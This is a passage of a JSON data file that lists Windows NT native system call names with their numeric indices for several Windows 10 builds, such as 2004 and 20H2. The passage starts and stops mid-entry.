\"319\", \"NtQueryFullAttributesFile\": \"320\", \"NtQueryInformationAtom\": \"321\", \"NtQueryInformationByName\": \"322\", \"NtQueryInformationEnlistment\": \"323\", \"NtQueryInformationJobObject\": \"324\", \"NtQueryInformationPort\": \"325\", \"NtQueryInformationResourceManager\": \"326\", \"NtQueryInformationTransaction\": \"327\", \"NtQueryInformationTransactionManager\": \"328\", \"NtQueryInformationWorkerFactory\": \"329\", \"NtQueryInstallUILanguage\": \"330\", \"NtQueryIntervalProfile\": \"331\", \"NtQueryIoCompletion\": \"332\", \"NtQueryLicenseValue\": \"333\", \"NtQueryMultipleValueKey\": \"334\", \"NtQueryMutant\": \"335\", \"NtQueryOpenSubKeys\": \"336\", \"NtQueryOpenSubKeysEx\": \"337\", \"NtQueryPortInformationProcess\": \"338\", \"NtQueryQuotaInformationFile\": \"339\", \"NtQuerySecurityAttributesToken\": \"340\", \"NtQuerySecurityObject\": \"341\", \"NtQuerySecurityPolicy\": \"342\", \"NtQuerySemaphore\": \"343\", \"NtQuerySymbolicLinkObject\": \"344\", \"NtQuerySystemEnvironmentValue\": \"345\", \"NtQuerySystemEnvironmentValueEx\": \"346\", \"NtQuerySystemInformationEx\": \"347\", \"NtQueryTimerResolution\": \"348\", \"NtQueryWnfStateData\": \"349\", \"NtQueryWnfStateNameInformation\": \"350\", \"NtQueueApcThreadEx\": \"351\", \"NtRaiseException\": \"352\", \"NtRaiseHardError\": \"353\", \"NtReadOnlyEnlistment\": \"354\", \"NtRecoverEnlistment\": \"355\", \"NtRecoverResourceManager\": \"356\", \"NtRecoverTransactionManager\": \"357\", \"NtRegisterProtocolAddressInformation\": \"358\", \"NtRegisterThreadTerminatePort\": \"359\", \"NtReleaseKeyedEvent\": \"360\", \"NtReleaseWorkerFactoryWorker\": \"361\", \"NtRemoveIoCompletionEx\": \"362\", \"NtRemoveProcessDebug\": \"363\", \"NtRenameKey\": \"364\", \"NtRenameTransactionManager\": \"365\", \"NtReplaceKey\": \"366\", \"NtReplacePartitionUnit\": \"367\", \"NtReplyWaitReplyPort\": \"368\", \"NtRequestPort\": \"369\", \"NtResetEvent\": \"370\", \"NtResetWriteWatch\": \"371\", \"NtRestoreKey\": \"372\", \"NtResumeProcess\": \"373\", \"NtRevertContainerImpersonation\": \"374\", \"NtRollbackComplete\": \"375\", \"NtRollbackEnlistment\": \"376\", \"NtRollbackRegistryTransaction\": \"377\", \"NtRollbackTransaction\": \"378\", \"NtRollforwardTransactionManager\": \"379\", \"NtSaveKey\": \"380\", \"NtSaveKeyEx\": \"381\", \"NtSaveMergedKeys\": \"382\", \"NtSecureConnectPort\": \"383\", \"NtSerializeBoot\": \"384\", \"NtSetBootEntryOrder\": \"385\", \"NtSetBootOptions\": \"386\", \"NtSetCachedSigningLevel\": \"387\", \"NtSetCachedSigningLevel2\": \"388\", \"NtSetContextThread\": \"389\", \"NtSetDebugFilterState\": \"390\", \"NtSetDefaultHardErrorPort\": \"391\", \"NtSetDefaultLocale\": \"392\", \"NtSetDefaultUILanguage\": \"393\", \"NtSetDriverEntryOrder\": \"394\", \"NtSetEaFile\": \"395\", \"NtSetHighEventPair\": \"396\", \"NtSetHighWaitLowEventPair\": \"397\", \"NtSetIRTimer\": \"398\", \"NtSetInformationDebugObject\": \"399\", \"NtSetInformationEnlistment\": \"400\", \"NtSetInformationJobObject\": \"401\", \"NtSetInformationKey\": \"402\", \"NtSetInformationResourceManager\": \"403\", \"NtSetInformationSymbolicLink\": \"404\", \"NtSetInformationToken\": \"405\", \"NtSetInformationTransaction\": \"406\", \"NtSetInformationTransactionManager\": \"407\", \"NtSetInformationVirtualMemory\": \"408\", \"NtSetInformationWorkerFactory\": \"409\", \"NtSetIntervalProfile\": \"410\", \"NtSetIoCompletion\": \"411\", \"NtSetIoCompletionEx\": \"412\", \"NtSetLdtEntries\": \"413\", \"NtSetLowEventPair\": \"414\", \"NtSetLowWaitHighEventPair\": \"415\", \"NtSetQuotaInformationFile\": \"416\", \"NtSetSecurityObject\": \"417\", \"NtSetSystemEnvironmentValue\": \"418\", \"NtSetSystemEnvironmentValueEx\": \"419\", \"NtSetSystemInformation\": \"420\", \"NtSetSystemPowerState\": \"421\", \"NtSetSystemTime\": \"422\", \"NtSetThreadExecutionState\": \"423\", \"NtSetTimer2\": \"424\", \"NtSetTimerEx\": \"425\", \"NtSetTimerResolution\": \"426\", \"NtSetUuidSeed\": \"427\", \"NtSetVolumeInformationFile\": \"428\", \"NtSetWnfProcessNotificationEvent\": \"429\", \"NtShutdownSystem\": \"430\", \"NtShutdownWorkerFactory\": \"431\", \"NtSignalAndWaitForSingleObject\": \"432\", \"NtSinglePhaseReject\": \"433\", \"NtStartProfile\": \"434\", \"NtStopProfile\": \"435\", \"NtSubscribeWnfStateChange\": \"436\", \"NtSuspendProcess\": \"437\", \"NtSuspendThread\": \"438\", \"NtSystemDebugControl\": \"439\", \"NtTerminateEnclave\": \"440\", \"NtTerminateJobObject\": \"441\", \"NtTestAlert\": \"442\", \"NtThawRegistry\": \"443\", \"NtThawTransactions\": \"444\", \"NtTraceControl\": \"445\", \"NtTranslateFilePath\": \"446\", \"NtUmsThreadYield\": \"447\", \"NtUnloadDriver\": \"448\", \"NtUnloadKey\": \"449\", \"NtUnloadKey2\": \"450\", \"NtUnloadKeyEx\": \"451\", \"NtUnlockFile\": \"452\", \"NtUnlockVirtualMemory\": \"453\", \"NtUnmapViewOfSectionEx\": \"454\", \"NtUnsubscribeWnfStateChange\": \"455\", \"NtUpdateWnfStateData\": \"456\", \"NtVdmControl\": \"457\", \"NtWaitForAlertByThreadId\": \"458\", \"NtWaitForDebugEvent\": \"459\", \"NtWaitForKeyedEvent\": \"460\", \"NtWaitForWorkViaWorkerFactory\": \"461\", \"NtWaitHighEventPair\": \"462\", \"NtWaitLowEventPair\": \"463\"}, \"2004\": {\"NtAccessCheck\": \"0\", \"NtWorkerFactoryWorkerReady\": \"1\", \"NtAcceptConnectPort\": \"2\", \"NtMapUserPhysicalPagesScatter\": \"3\", \"NtWaitForSingleObject\": \"4\", \"NtCallbackReturn\": \"5\", \"NtReadFile\": \"6\", \"NtDeviceIoControlFile\": \"7\", \"NtWriteFile\": \"8\", \"NtRemoveIoCompletion\": \"9\", \"NtReleaseSemaphore\": \"10\", \"NtReplyWaitReceivePort\": \"11\", \"NtReplyPort\": \"12\", \"NtSetInformationThread\": \"13\", \"NtSetEvent\": \"14\", \"NtClose\": \"15\", \"NtQueryObject\": \"16\", \"NtQueryInformationFile\": \"17\", \"NtOpenKey\": \"18\", \"NtEnumerateValueKey\": \"19\", \"NtFindAtom\": \"20\", \"NtQueryDefaultLocale\": \"21\", \"NtQueryKey\": \"22\", \"NtQueryValueKey\": \"23\", \"NtAllocateVirtualMemory\": \"24\", \"NtQueryInformationProcess\": \"25\", \"NtWaitForMultipleObjects32\": \"26\", \"NtWriteFileGather\": \"27\", \"NtSetInformationProcess\": \"28\", \"NtCreateKey\": \"29\", \"NtFreeVirtualMemory\": \"30\", \"NtImpersonateClientOfPort\": \"31\", \"NtReleaseMutant\": \"32\", \"NtQueryInformationToken\": \"33\", \"NtRequestWaitReplyPort\": \"34\", \"NtQueryVirtualMemory\": \"35\", \"NtOpenThreadToken\": \"36\", \"NtQueryInformationThread\": \"37\", \"NtOpenProcess\": \"38\", \"NtSetInformationFile\": \"39\", \"NtMapViewOfSection\": \"40\", \"NtAccessCheckAndAuditAlarm\": \"41\", \"NtUnmapViewOfSection\": \"42\", \"NtReplyWaitReceivePortEx\": \"43\", \"NtTerminateProcess\": \"44\", \"NtSetEventBoostPriority\": \"45\", \"NtReadFileScatter\": \"46\", \"NtOpenThreadTokenEx\": \"47\", \"NtOpenProcessTokenEx\": \"48\", \"NtQueryPerformanceCounter\": \"49\", \"NtEnumerateKey\": \"50\", \"NtOpenFile\": \"51\", \"NtDelayExecution\": \"52\", \"NtQueryDirectoryFile\": \"53\", \"NtQuerySystemInformation\": \"54\", \"NtOpenSection\": \"55\", \"NtQueryTimer\": \"56\", \"NtFsControlFile\": \"57\", \"NtWriteVirtualMemory\": \"58\", \"NtCloseObjectAuditAlarm\": \"59\", \"NtDuplicateObject\": \"60\", \"NtQueryAttributesFile\": \"61\", \"NtClearEvent\": \"62\", \"NtReadVirtualMemory\": \"63\", \"NtOpenEvent\": \"64\", \"NtAdjustPrivilegesToken\": \"65\", \"NtDuplicateToken\": \"66\", \"NtContinue\": \"67\", \"NtQueryDefaultUILanguage\": \"68\", \"NtQueueApcThread\": \"69\", \"NtYieldExecution\": \"70\", \"NtAddAtom\": \"71\", \"NtCreateEvent\": \"72\", \"NtQueryVolumeInformationFile\": \"73\", \"NtCreateSection\": \"74\", \"NtFlushBuffersFile\": \"75\", \"NtApphelpCacheControl\": \"76\", \"NtCreateProcessEx\": \"77\", \"NtCreateThread\": \"78\", \"NtIsProcessInJob\": \"79\", \"NtProtectVirtualMemory\": \"80\", \"NtQuerySection\": \"81\", \"NtResumeThread\": \"82\", \"NtTerminateThread\": \"83\", \"NtReadRequestData\": \"84\", \"NtCreateFile\": \"85\", \"NtQueryEvent\": \"86\", \"NtWriteRequestData\": \"87\", \"NtOpenDirectoryObject\": \"88\", \"NtAccessCheckByTypeAndAuditAlarm\": \"89\", \"NtQuerySystemTime\": \"90\", \"NtWaitForMultipleObjects\": \"91\", \"NtSetInformationObject\": \"92\", \"NtCancelIoFile\": \"93\", \"NtTraceEvent\": \"94\", \"NtPowerInformation\": \"95\", \"NtSetValueKey\": \"96\", \"NtCancelTimer\": \"97\", \"NtSetTimer\": \"98\", \"NtAccessCheckByType\": \"99\", \"NtAccessCheckByTypeResultList\": \"100\", \"NtAccessCheckByTypeResultListAndAuditAlarm\": \"101\", \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\": \"102\", \"NtAcquireCrossVmMutant\": \"103\", \"NtAcquireProcessActivityReference\": \"104\", \"NtAddAtomEx\": \"105\", \"NtAddBootEntry\": \"106\", \"NtAddDriverEntry\": \"107\", \"NtAdjustGroupsToken\": \"108\", \"NtAdjustTokenClaimsAndDeviceGroups\": \"109\", \"NtAlertResumeThread\": \"110\", \"NtAlertThread\": \"111\", \"NtAlertThreadByThreadId\": \"112\", \"NtAllocateLocallyUniqueId\": \"113\", \"NtAllocateReserveObject\": \"114\", \"NtAllocateUserPhysicalPages\": \"115\", \"NtAllocateUserPhysicalPagesEx\": \"116\", \"NtAllocateUuids\": \"117\", \"NtAllocateVirtualMemoryEx\": \"118\", \"NtAlpcAcceptConnectPort\": \"119\", \"NtAlpcCancelMessage\": \"120\", \"NtAlpcConnectPort\": \"121\", \"NtAlpcConnectPortEx\": \"122\", \"NtAlpcCreatePort\": \"123\", \"NtAlpcCreatePortSection\": \"124\", \"NtAlpcCreateResourceReserve\": \"125\", \"NtAlpcCreateSectionView\": \"126\", \"NtAlpcCreateSecurityContext\": \"127\", \"NtAlpcDeletePortSection\": \"128\", \"NtAlpcDeleteResourceReserve\": \"129\", \"NtAlpcDeleteSectionView\": \"130\", \"NtAlpcDeleteSecurityContext\": \"131\", \"NtAlpcDisconnectPort\": \"132\", \"NtAlpcImpersonateClientContainerOfPort\": \"133\", \"NtAlpcImpersonateClientOfPort\": \"134\", \"NtAlpcOpenSenderProcess\": \"135\", \"NtAlpcOpenSenderThread\": \"136\", \"NtAlpcQueryInformation\": \"137\", \"NtAlpcQueryInformationMessage\": \"138\", \"NtAlpcRevokeSecurityContext\": \"139\", \"NtAlpcSendWaitReceivePort\": \"140\", \"NtAlpcSetInformation\": \"141\", \"NtAreMappedFilesTheSame\": \"142\", \"NtAssignProcessToJobObject\": \"143\", \"NtAssociateWaitCompletionPacket\": \"144\", \"NtCallEnclave\": \"145\", \"NtCancelIoFileEx\": \"146\", \"NtCancelSynchronousIoFile\": \"147\", \"NtCancelTimer2\": \"148\", \"NtCancelWaitCompletionPacket\": \"149\", \"NtCommitComplete\": \"150\", \"NtCommitEnlistment\": \"151\", \"NtCommitRegistryTransaction\": \"152\", \"NtCommitTransaction\": \"153\", \"NtCompactKeys\": \"154\", \"NtCompareObjects\": \"155\", \"NtCompareSigningLevels\": \"156\", \"NtCompareTokens\": \"157\", \"NtCompleteConnectPort\": \"158\", \"NtCompressKey\": \"159\", \"NtConnectPort\": \"160\", \"NtContinueEx\": \"161\", \"NtConvertBetweenAuxiliaryCounterAndPerformanceCounter\": \"162\", \"NtCreateCrossVmEvent\": \"163\", \"NtCreateCrossVmMutant\": \"164\", \"NtCreateDebugObject\": \"165\", \"NtCreateDirectoryObject\": \"166\", \"NtCreateDirectoryObjectEx\": \"167\", \"NtCreateEnclave\": \"168\", \"NtCreateEnlistment\": \"169\", \"NtCreateEventPair\": \"170\", \"NtCreateIRTimer\": \"171\", \"NtCreateIoCompletion\": \"172\", \"NtCreateJobObject\": \"173\", \"NtCreateJobSet\": \"174\", \"NtCreateKeyTransacted\": \"175\", \"NtCreateKeyedEvent\": \"176\", \"NtCreateLowBoxToken\": \"177\", \"NtCreateMailslotFile\": \"178\", \"NtCreateMutant\": \"179\", \"NtCreateNamedPipeFile\": \"180\", \"NtCreatePagingFile\": \"181\", \"NtCreatePartition\": \"182\", \"NtCreatePort\": \"183\", \"NtCreatePrivateNamespace\": \"184\", \"NtCreateProcess\": \"185\", \"NtCreateProfile\": \"186\", \"NtCreateProfileEx\": \"187\", \"NtCreateRegistryTransaction\": \"188\", \"NtCreateResourceManager\": \"189\", \"NtCreateSectionEx\": \"190\", \"NtCreateSemaphore\": \"191\", \"NtCreateSymbolicLinkObject\": \"192\", \"NtCreateThreadEx\": \"193\", \"NtCreateTimer\": \"194\", \"NtCreateTimer2\": \"195\", \"NtCreateToken\": \"196\", \"NtCreateTokenEx\": \"197\", \"NtCreateTransaction\": \"198\", \"NtCreateTransactionManager\": \"199\", \"NtCreateUserProcess\": \"200\", \"NtCreateWaitCompletionPacket\": \"201\", \"NtCreateWaitablePort\": \"202\", \"NtCreateWnfStateName\": \"203\", \"NtCreateWorkerFactory\": \"204\", \"NtDebugActiveProcess\": \"205\", \"NtDebugContinue\": \"206\", \"NtDeleteAtom\": \"207\", \"NtDeleteBootEntry\": \"208\", \"NtDeleteDriverEntry\": \"209\", \"NtDeleteFile\": \"210\", \"NtDeleteKey\": \"211\", \"NtDeleteObjectAuditAlarm\": \"212\", \"NtDeletePrivateNamespace\": \"213\", \"NtDeleteValueKey\": \"214\", \"NtDeleteWnfStateData\": \"215\", \"NtDeleteWnfStateName\": \"216\", \"NtDirectGraphicsCall\": \"217\", \"NtDisableLastKnownGood\": \"218\", \"NtDisplayString\": \"219\", \"NtDrawText\": \"220\", \"NtEnableLastKnownGood\": \"221\", \"NtEnumerateBootEntries\": \"222\", \"NtEnumerateDriverEntries\": \"223\", \"NtEnumerateSystemEnvironmentValuesEx\": \"224\", \"NtEnumerateTransactionObject\": \"225\", \"NtExtendSection\": \"226\", \"NtFilterBootOption\": \"227\", \"NtFilterToken\": \"228\", \"NtFilterTokenEx\": \"229\", \"NtFlushBuffersFileEx\": \"230\", \"NtFlushInstallUILanguage\": \"231\", \"NtFlushInstructionCache\": \"232\", \"NtFlushKey\": \"233\", \"NtFlushProcessWriteBuffers\": \"234\", \"NtFlushVirtualMemory\": \"235\", \"NtFlushWriteBuffer\": \"236\", \"NtFreeUserPhysicalPages\": \"237\", \"NtFreezeRegistry\": \"238\", \"NtFreezeTransactions\": \"239\", \"NtGetCachedSigningLevel\": \"240\", \"NtGetCompleteWnfStateSubscription\": \"241\", \"NtGetContextThread\": \"242\", \"NtGetCurrentProcessorNumber\": \"243\", \"NtGetCurrentProcessorNumberEx\": \"244\", \"NtGetDevicePowerState\": \"245\", \"NtGetMUIRegistryInfo\": \"246\", \"NtGetNextProcess\": \"247\", \"NtGetNextThread\": \"248\", \"NtGetNlsSectionPtr\": \"249\", \"NtGetNotificationResourceManager\": \"250\", \"NtGetWriteWatch\": \"251\", \"NtImpersonateAnonymousToken\": \"252\", \"NtImpersonateThread\": \"253\", \"NtInitializeEnclave\": \"254\", \"NtInitializeNlsFiles\": \"255\", \"NtInitializeRegistry\": \"256\", \"NtInitiatePowerAction\": \"257\", \"NtIsSystemResumeAutomatic\": \"258\", \"NtIsUILanguageComitted\": \"259\", \"NtListenPort\": \"260\", \"NtLoadDriver\": \"261\", \"NtLoadEnclaveData\": \"262\", \"NtLoadKey\": \"263\", \"NtLoadKey2\": \"264\", \"NtLoadKeyEx\": \"265\", \"NtLockFile\": \"266\", \"NtLockProductActivationKeys\": \"267\", \"NtLockRegistryKey\": \"268\", \"NtLockVirtualMemory\": \"269\", \"NtMakePermanentObject\": \"270\", \"NtMakeTemporaryObject\": \"271\", \"NtManageHotPatch\": \"272\", \"NtManagePartition\": \"273\", \"NtMapCMFModule\": \"274\", \"NtMapUserPhysicalPages\": \"275\", \"NtMapViewOfSectionEx\": \"276\", \"NtModifyBootEntry\": \"277\", \"NtModifyDriverEntry\": \"278\", \"NtNotifyChangeDirectoryFile\": \"279\", \"NtNotifyChangeDirectoryFileEx\": \"280\", \"NtNotifyChangeKey\": \"281\", \"NtNotifyChangeMultipleKeys\": \"282\", \"NtNotifyChangeSession\": \"283\", \"NtOpenEnlistment\": \"284\", \"NtOpenEventPair\": \"285\", \"NtOpenIoCompletion\": \"286\", \"NtOpenJobObject\": \"287\", \"NtOpenKeyEx\": \"288\", \"NtOpenKeyTransacted\": \"289\", \"NtOpenKeyTransactedEx\": \"290\", \"NtOpenKeyedEvent\": \"291\", \"NtOpenMutant\": \"292\", \"NtOpenObjectAuditAlarm\": \"293\", \"NtOpenPartition\": \"294\", \"NtOpenPrivateNamespace\": \"295\", \"NtOpenProcessToken\": \"296\", \"NtOpenRegistryTransaction\": \"297\", \"NtOpenResourceManager\": \"298\", \"NtOpenSemaphore\": \"299\", \"NtOpenSession\": \"300\", \"NtOpenSymbolicLinkObject\": \"301\", \"NtOpenThread\": \"302\", \"NtOpenTimer\": \"303\", \"NtOpenTransaction\": \"304\", \"NtOpenTransactionManager\": \"305\", \"NtPlugPlayControl\": \"306\", \"NtPrePrepareComplete\": \"307\", \"NtPrePrepareEnlistment\": \"308\", \"NtPrepareComplete\": \"309\", \"NtPrepareEnlistment\": \"310\", \"NtPrivilegeCheck\": \"311\", \"NtPrivilegeObjectAuditAlarm\": \"312\", \"NtPrivilegedServiceAuditAlarm\": \"313\", \"NtPropagationComplete\": \"314\", \"NtPropagationFailed\": \"315\", \"NtPssCaptureVaSpaceBulk\": \"316\", \"NtPulseEvent\": \"317\", \"NtQueryAuxiliaryCounterFrequency\": \"318\", \"NtQueryBootEntryOrder\": \"319\", \"NtQueryBootOptions\": \"320\", \"NtQueryDebugFilterState\": \"321\", \"NtQueryDirectoryFileEx\": \"322\", \"NtQueryDirectoryObject\": \"323\", \"NtQueryDriverEntryOrder\": \"324\", \"NtQueryEaFile\": \"325\", \"NtQueryFullAttributesFile\": \"326\", \"NtQueryInformationAtom\": \"327\", \"NtQueryInformationByName\": \"328\", \"NtQueryInformationEnlistment\": \"329\", \"NtQueryInformationJobObject\": \"330\", \"NtQueryInformationPort\": \"331\", \"NtQueryInformationResourceManager\": \"332\", \"NtQueryInformationTransaction\": \"333\", \"NtQueryInformationTransactionManager\": \"334\", \"NtQueryInformationWorkerFactory\": \"335\", \"NtQueryInstallUILanguage\": \"336\", \"NtQueryIntervalProfile\": \"337\", \"NtQueryIoCompletion\": \"338\", \"NtQueryLicenseValue\": \"339\", \"NtQueryMultipleValueKey\": \"340\", \"NtQueryMutant\": \"341\", \"NtQueryOpenSubKeys\": \"342\", \"NtQueryOpenSubKeysEx\": \"343\", \"NtQueryPortInformationProcess\": \"344\", \"NtQueryQuotaInformationFile\": \"345\", \"NtQuerySecurityAttributesToken\": \"346\", \"NtQuerySecurityObject\": \"347\", \"NtQuerySecurityPolicy\": \"348\", \"NtQuerySemaphore\": \"349\", \"NtQuerySymbolicLinkObject\": \"350\", \"NtQuerySystemEnvironmentValue\": \"351\", \"NtQuerySystemEnvironmentValueEx\": \"352\", \"NtQuerySystemInformationEx\": \"353\", \"NtQueryTimerResolution\": \"354\", \"NtQueryWnfStateData\": \"355\", \"NtQueryWnfStateNameInformation\": \"356\", \"NtQueueApcThreadEx\": \"357\", \"NtRaiseException\": \"358\", \"NtRaiseHardError\": \"359\", \"NtReadOnlyEnlistment\": \"360\", \"NtRecoverEnlistment\": \"361\", \"NtRecoverResourceManager\": \"362\", \"NtRecoverTransactionManager\": \"363\", \"NtRegisterProtocolAddressInformation\": \"364\", \"NtRegisterThreadTerminatePort\": \"365\", \"NtReleaseKeyedEvent\": \"366\", \"NtReleaseWorkerFactoryWorker\": \"367\", \"NtRemoveIoCompletionEx\": \"368\", \"NtRemoveProcessDebug\": \"369\", \"NtRenameKey\": \"370\", \"NtRenameTransactionManager\": \"371\", \"NtReplaceKey\": \"372\", \"NtReplacePartitionUnit\": \"373\", \"NtReplyWaitReplyPort\": \"374\", \"NtRequestPort\": \"375\", \"NtResetEvent\": \"376\", \"NtResetWriteWatch\": \"377\", \"NtRestoreKey\": \"378\", \"NtResumeProcess\": \"379\", \"NtRevertContainerImpersonation\": \"380\", \"NtRollbackComplete\": \"381\", \"NtRollbackEnlistment\": \"382\", \"NtRollbackRegistryTransaction\": \"383\", \"NtRollbackTransaction\": \"384\", \"NtRollforwardTransactionManager\": \"385\", \"NtSaveKey\": \"386\", \"NtSaveKeyEx\": \"387\", \"NtSaveMergedKeys\": \"388\", \"NtSecureConnectPort\": \"389\", \"NtSerializeBoot\": \"390\", \"NtSetBootEntryOrder\": \"391\", \"NtSetBootOptions\": \"392\", \"NtSetCachedSigningLevel\": \"393\", \"NtSetCachedSigningLevel2\": \"394\", \"NtSetContextThread\": \"395\", \"NtSetDebugFilterState\": \"396\", \"NtSetDefaultHardErrorPort\": \"397\", \"NtSetDefaultLocale\": \"398\", \"NtSetDefaultUILanguage\": \"399\", \"NtSetDriverEntryOrder\": \"400\", \"NtSetEaFile\": \"401\", \"NtSetHighEventPair\": \"402\", \"NtSetHighWaitLowEventPair\": \"403\", \"NtSetIRTimer\": \"404\", \"NtSetInformationDebugObject\": \"405\", \"NtSetInformationEnlistment\": \"406\", \"NtSetInformationJobObject\": \"407\", \"NtSetInformationKey\": \"408\", \"NtSetInformationResourceManager\": \"409\", \"NtSetInformationSymbolicLink\": \"410\", \"NtSetInformationToken\": \"411\", \"NtSetInformationTransaction\": \"412\", \"NtSetInformationTransactionManager\": \"413\", \"NtSetInformationVirtualMemory\": \"414\", \"NtSetInformationWorkerFactory\": \"415\", \"NtSetIntervalProfile\": \"416\", \"NtSetIoCompletion\": \"417\", \"NtSetIoCompletionEx\": \"418\", \"NtSetLdtEntries\": \"419\", \"NtSetLowEventPair\": \"420\", \"NtSetLowWaitHighEventPair\": \"421\", \"NtSetQuotaInformationFile\": \"422\", \"NtSetSecurityObject\": \"423\", \"NtSetSystemEnvironmentValue\": \"424\", \"NtSetSystemEnvironmentValueEx\": \"425\", \"NtSetSystemInformation\": \"426\", \"NtSetSystemPowerState\": \"427\", \"NtSetSystemTime\": \"428\", \"NtSetThreadExecutionState\": \"429\", \"NtSetTimer2\": \"430\", \"NtSetTimerEx\": \"431\", \"NtSetTimerResolution\": \"432\", \"NtSetUuidSeed\": \"433\", \"NtSetVolumeInformationFile\": \"434\", \"NtSetWnfProcessNotificationEvent\": \"435\", \"NtShutdownSystem\": \"436\", \"NtShutdownWorkerFactory\": \"437\", \"NtSignalAndWaitForSingleObject\": \"438\", \"NtSinglePhaseReject\": \"439\", \"NtStartProfile\": \"440\", \"NtStopProfile\": \"441\", \"NtSubscribeWnfStateChange\": \"442\", \"NtSuspendProcess\": \"443\", \"NtSuspendThread\": \"444\", \"NtSystemDebugControl\": \"445\", \"NtTerminateEnclave\": \"446\", \"NtTerminateJobObject\": \"447\", \"NtTestAlert\": \"448\", \"NtThawRegistry\": \"449\", \"NtThawTransactions\": \"450\", \"NtTraceControl\": \"451\", \"NtTranslateFilePath\": \"452\", \"NtUmsThreadYield\": \"453\", \"NtUnloadDriver\": \"454\", \"NtUnloadKey\": \"455\", \"NtUnloadKey2\": \"456\", \"NtUnloadKeyEx\": \"457\", \"NtUnlockFile\": \"458\", \"NtUnlockVirtualMemory\": \"459\", \"NtUnmapViewOfSectionEx\": \"460\", \"NtUnsubscribeWnfStateChange\": \"461\", \"NtUpdateWnfStateData\": \"462\", \"NtVdmControl\": \"463\", \"NtWaitForAlertByThreadId\": \"464\", \"NtWaitForDebugEvent\": \"465\", \"NtWaitForKeyedEvent\": \"466\", \"NtWaitForWorkViaWorkerFactory\": \"467\", \"NtWaitHighEventPair\": \"468\", \"NtWaitLowEventPair\": \"469\", \"NtLoadKey3\": \"470\"}, \"20H2\": {\"NtAccessCheck\": \"0\", \"NtWorkerFactoryWorkerReady\": \"1\", \"NtAcceptConnectPort\": \"2\", \"NtMapUserPhysicalPagesScatter\": \"3\", \"NtWaitForSingleObject\": \"4\", \"NtCallbackReturn\": \"5\", \"NtReadFile\": \"6\", \"NtDeviceIoControlFile\": \"7\", \"NtWriteFile\": \"8\", \"NtRemoveIoCompletion\": \"9\", \"NtReleaseSemaphore\": \"10\", \"NtReplyWaitReceivePort\": \"11\", \"NtReplyPort\": \"12\", \"NtSetInformationThread\": \"13\", \"NtSetEvent\": \"14\", \"NtClose\": \"15\", \"NtQueryObject\": \"16\", \"NtQueryInformationFile\": \"17\", \"NtOpenKey\": \"18\", \"NtEnumerateValueKey\": \"19\", \"NtFindAtom\": \"20\", \"NtQueryDefaultLocale\": \"21\", \"NtQueryKey\": \"22\", \"NtQueryValueKey\": \"23\", \"NtAllocateVirtualMemory\": \"24\", \"NtQueryInformationProcess\": \"25\", \"NtWaitForMultipleObjects32\": \"26\", \"NtWriteFileGather\": \"27\", \"NtSetInformationProcess\": \"28\", \"NtCreateKey\": \"29\", \"NtFreeVirtualMemory\": \"30\", \"NtImpersonateClientOfPort\": \"31\", \"NtReleaseMutant\": \"32\", \"NtQueryInformationToken\": \"33\", \"NtRequestWaitReplyPort\": \"34\", \"NtQueryVirtualMemory\": \"35\", \"NtOpenThreadToken\": \"36\", \"NtQueryInformationThread\": \"37\", \"NtOpenProcess\": \"38\", \"NtSetInformationFile\": \"39\", \"NtMapViewOfSection\": \"40\", \"NtAccessCheckAndAuditAlarm\": \"41\", \"NtUnmapViewOfSection\": \"42\", \"NtReplyWaitReceivePortEx\": \"43\", \"NtTerminateProcess\": \"44\", \"NtSetEventBoostPriority\": \"45\", \"NtReadFileScatter\": \"46\", \"NtOpenThreadTokenEx\": \"47\", \"NtOpenProcessTokenEx\": \"48\", \"NtQueryPerformanceCounter\": \"49\", \"NtEnumerateKey\": \"50\", \"NtOpenFile\": \"51\", \"NtDelayExecution\": \"52\", \"NtQueryDirectoryFile\": \"53\", \"NtQuerySystemInformation\": \"54\", \"NtOpenSection\": \"55\", \"NtQueryTimer\": \"56\", \"NtFsControlFile\": \"57\", \"NtWriteVirtualMemory\": \"58\", \"NtCloseObjectAuditAlarm\": \"59\", \"NtDuplicateObject\": \"60\", \"NtQueryAttributesFile\": \"61\", \"NtClearEvent\": \"62\", \"NtReadVirtualMemory\": \"63\", \"NtOpenEvent\": \"64\", \"NtAdjustPrivilegesToken\": \"65\", \"NtDuplicateToken\": \"66\", \"NtContinue\": \"67\", \"NtQueryDefaultUILanguage\": \"68\", \"NtQueueApcThread\": \"69\", \"NtYieldExecution\": \"70\", \"NtAddAtom\": \"71\", \"NtCreateEvent\": \"72\", \"NtQueryVolumeInformationFile\": \"73\", \"NtCreateSection\": \"74\", \"NtFlushBuffersFile\": \"75\", \"NtApphelpCacheControl\": \"76\", \"NtCreateProcessEx\": \"77\", \"NtCreateThread\": \"78\", \"NtIsProcessInJob\": \"79\", \"NtProtectVirtualMemory\": \"80\", \"NtQuerySection\": \"81\", \"NtResumeThread\": \"82\", \"NtTerminateThread\": \"83\", \"NtReadRequestData\": \"84\", \"NtCreateFile\": \"85\", \"NtQueryEvent\": \"86\", \"NtWriteRequestData\": \"87\", \"NtOpenDirectoryObject\": \"88\", \"NtAccessCheckByTypeAndAuditAlarm\": \"89\", \"NtQuerySystemTime\": \"90\", \"NtWaitForMultipleObjects\": \"91\", \"NtSetInformationObject\": \"92\", \"NtCancelIoFile\": \"93\", \"NtTraceEvent\": \"94\", \"NtPowerInformation\": \"95\", \"NtSetValueKey\": \"96\", \"NtCancelTimer\": \"97\", \"NtSetTimer\": \"98\", \"NtAccessCheckByType\": \"99\", \"NtAccessCheckByTypeResultList\": \"100\", \"NtAccessCheckByTypeResultListAndAuditAlarm\": \"101\", \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\": \"102\", \"NtAcquireCrossVmMutant\": \"103\", \"NtAcquireProcessActivityReference\": \"104\", \"NtAddAtomEx\": \"105\", \"NtAddBootEntry\": \"106\", \"NtAddDriverEntry\": \"107\", \"NtAdjustGroupsToken\": \"108\", \"NtAdjustTokenClaimsAndDeviceGroups\": \"109\", \"NtAlertResumeThread\": \"110\", \"NtAlertThread\": \"111\", \"NtAlertThreadByThreadId\": \"112\", \"NtAllocateLocallyUniqueId\": \"113\", \"NtAllocateReserveObject\": \"114\", \"NtAllocateUserPhysicalPages\": \"115\", \"NtAllocateUserPhysicalPagesEx\": \"116\", \"NtAllocateUuids\": \"117\", \"NtAllocateVirtualMemoryEx\": \"118\", \"NtAlpcAcceptConnectPort\": \"119\", \"NtAlpcCancelMessage\": \"120\", \"NtAlpcConnectPort\": \"121\", \"NtAlpcConnectPortEx\": \"122\", \"NtAlpcCreatePort\": \"123\", \"NtAlpcCreatePortSection\": \"124\", \"NtAlpcCreateResourceReserve\": \"125\", 